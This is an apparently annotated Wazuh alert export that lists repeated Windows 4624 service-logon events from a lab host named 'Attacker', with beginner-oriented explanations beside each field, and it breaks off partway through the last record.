data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:17.3947487Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43643 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9160 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533923.326315 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:31.0469437Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43645 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9160 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533923.333651 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:35.7410981Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43647 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9160 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533923.340987 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:37.0396840Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43649 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533923.348325 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:37.1845071Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43651 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533925.355663 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:40.7220277Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43675 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9160 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
